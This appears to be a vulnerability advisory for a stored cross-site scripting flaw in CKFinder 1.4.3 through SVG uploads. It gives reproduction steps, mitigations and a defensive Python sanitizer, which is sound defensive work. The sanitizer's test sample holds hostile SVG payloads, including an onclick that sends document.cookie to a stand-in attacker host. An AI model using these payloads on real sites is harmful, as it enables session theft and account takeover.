CKFinder
cpe:2.3:a:cksource:ckfinder:*:*:*:*:*:*:*, +4 more
- 1.4.3
A stored cross-site scripting vulnerability has been identified in CKFinder version 1.4.3. The file upload functionality accepts SVG files without removing the active content they may carry (script elements, event-handler attributes, javascript: links), and the stored file is later served to and rendered by the browser. An attacker with upload rights can therefore execute arbitrary JavaScript in the victim's browser, within the origin that serves the file, whenever the uploaded file is viewed or previewed.
Successful exploitation can expose session tokens or other sensitive information, manipulate the Document Object Model, or redirect the victim to an attacker-controlled site. Cookies marked HttpOnly cannot be read directly, but the script can still issue authenticated requests from the victim's session. If the victim is an administrator previewing uploads, the script runs with administrative privileges and can drive the admin or management interfaces on the attacker's behalf.
To reproduce, log into an application that uses CKFinder version 1.4.3 with an account that is permitted to upload files. In the CKFinder file manager, upload a crafted SVG whose markup contains JavaScript (for example a script element, or an onload attribute on the root svg element). Then open or preview the uploaded file within CKFinder or in any page that links to it. Because the SVG is rendered as a document rather than as a plain image, the embedded JavaScript executes in the browser.
Users are advised to validate and sanitize uploaded SVG files before storing or rendering them: remove script and foreignObject elements, event-handler (on*) attributes, and hrefs that use the javascript: or data: schemes, or reject files that contain them. If SVG uploads are not necessary, remove svg from the allowed upload types in the CKFinder configuration. Where SVG uploads are required, run each file through a maintained sanitizer such as DOMPurify or SVG-Sanitizer before it is stored or rendered, rather than relying on ad hoc filtering. Serve uploaded SVGs with Content-Type: image/svg+xml, X-Content-Type-Options: nosniff and Content-Disposition: attachment, so the browser downloads the file instead of rendering it; where inline rendering is needed, add a restrictive Content-Security-Policy. Finally, host user-uploaded files on a separate origin (a dedicated domain or CDN) so that any script that does run cannot reach the application's cookies or DOM.
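As an added illustration of the reproduction and mitigation paragraphs above (example code written for this page, not CKFinder's code or a vendor-supplied fix), the Python below builds a constructed SVG carrying the common script vectors, detects them for a validate-and-reject policy, strips them for a sanitize-and-store policy, and assembles the response headers recommended above. The element and attribute lists, the sample files and the CSP value are assumptions chosen for the example; production code should use a maintained sanitizer such as DOMPurify or SVG-Sanitizer and a hardened XML parser.

```python
"""Added example: detect, strip and safely serve SVG active content.
Not CKFinder code; samples are constructed and the deny-lists are an
assumption covering common vectors. Stdlib XML is used to stay dependency-
free; production code should use a hardened parser such as defusedxml."""
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

SVG_NS, XLINK_NS = "http://www.w3.org/2000/svg", "http://www.w3.org/1999/xlink"
ET.register_namespace("", SVG_NS)        # serialize without ns0: prefixes
ET.register_namespace("xlink", XLINK_NS)
# Elements that run script or embed HTML/external documents (case-insensitive).
FORBIDDEN_ELEMENTS = {"script", "handler", "foreignobject", "iframe", "embed", "object"}
ALLOWED_SCHEMES = {"", "http", "https"}   # javascript:, data:, vbscript: are dropped
_CONTROL_CHARS = re.compile(r"[\x00-\x20\x7f]")

# Constructed malicious upload: each vector runs JavaScript when the file is
# opened or previewed as a document (not when it is merely shown via <img>).
MALICIOUS_SVG = b"""<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     width="100" height="100" onload="alert(document.domain)">
  <script>alert(document.cookie)</script>
  <rect width="100" height="100" fill="red"
        onclick="fetch('https://attacker.example/?c=' + document.cookie)"/>
  <a xlink:href="javascript:alert(1)"><text y="20">click me</text></a>
  <foreignObject><body xmlns="http://www.w3.org/1999/xhtml"><img src="x" onerror="alert(1)"/></body></foreignObject>
</svg>"""
# Constructed benign upload: a fragment href is legitimate and must survive.
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <defs><circle id="dot" r="2"/></defs><use xlink:href="#dot" x="5" y="5"/>
</svg>"""

def _local_name(qname):
    """'{http://www.w3.org/1999/xlink}href' -> 'href'."""
    return qname.rsplit("}", 1)[-1]

def _unsafe_href(value):
    """True when an href could execute or embed active content. Control chars are
    removed first: browsers ignore them in the scheme, so 'jav\\tascript:' still runs."""
    return urlsplit(_CONTROL_CHARS.sub("", value)).scheme.lower() not in ALLOWED_SCHEMES

def _scan(root, strip):
    """Walk the tree and report active content; remove it when strip is set."""
    if _local_name(root.tag).lower() != "svg":
        raise ValueError("root element is not <svg>")
    findings = []
    parents = {child: parent for parent in root.iter() for child in parent}
    for el in list(root.iter()):
        tag = _local_name(el.tag)
        if tag.lower() in FORBIDDEN_ELEMENTS:
            findings.append(f"element <{tag}>")
            if strip:
                parents[el].remove(el)
            continue
        for attr in list(el.attrib):
            name, value = _local_name(attr), el.attrib[attr]
            if name.lower().startswith("on"):
                findings.append(f"event handler {name} on <{tag}>")
            elif name.lower() == "href" and _unsafe_href(value):
                findings.append(f"href '{value}' on <{tag}>")
            else:
                continue
            if strip:
                del el.attrib[attr]
    return findings

def find_active_content(svg):
    """Validation pass: everything that would be stripped; empty means accept as-is."""
    return _scan(ET.fromstring(svg), strip=False)

def sanitize_svg(svg):
    """Sanitization pass: the document re-serialized with active content removed."""
    root = ET.fromstring(svg)
    _scan(root, strip=True)
    return ET.tostring(root, encoding="utf-8", xml_declaration=True)

def response_headers(filename, inline=False):
    """Headers for serving a stored SVG. The default forces a download so the file
    never renders as a document in the serving origin; inline mode keeps rendering
    but the CSP sandbox blocks script, external loads and plugins. nosniff stops
    the browser treating a mislabelled upload as HTML. These complement hosting
    uploads on a separate origin; they do not replace it."""
    safe_name = re.sub(r"[^A-Za-z0-9._-]", "_", filename).lstrip(".") or "upload.svg"
    return {
        "Content-Type": "image/svg+xml",
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": f'{"inline" if inline else "attachment"}; filename="{safe_name}"',
        "Content-Security-Policy": "default-src 'none'; style-src 'unsafe-inline'; sandbox",
    }

if __name__ == "__main__":
    for finding in find_active_content(MALICIOUS_SVG):
        print("found:", finding)
    print(sanitize_svg(MALICIOUS_SVG).decode())
    print(response_headers("logo.svg"))
```

Run the file directly to see the findings for the constructed upload and the cleaned markup. Whether you reject or sanitize, do it server-side at upload time, and still treat the stored file as untrusted when serving it: the attachment disposition and the CSP are what limit the damage if a vector is missed.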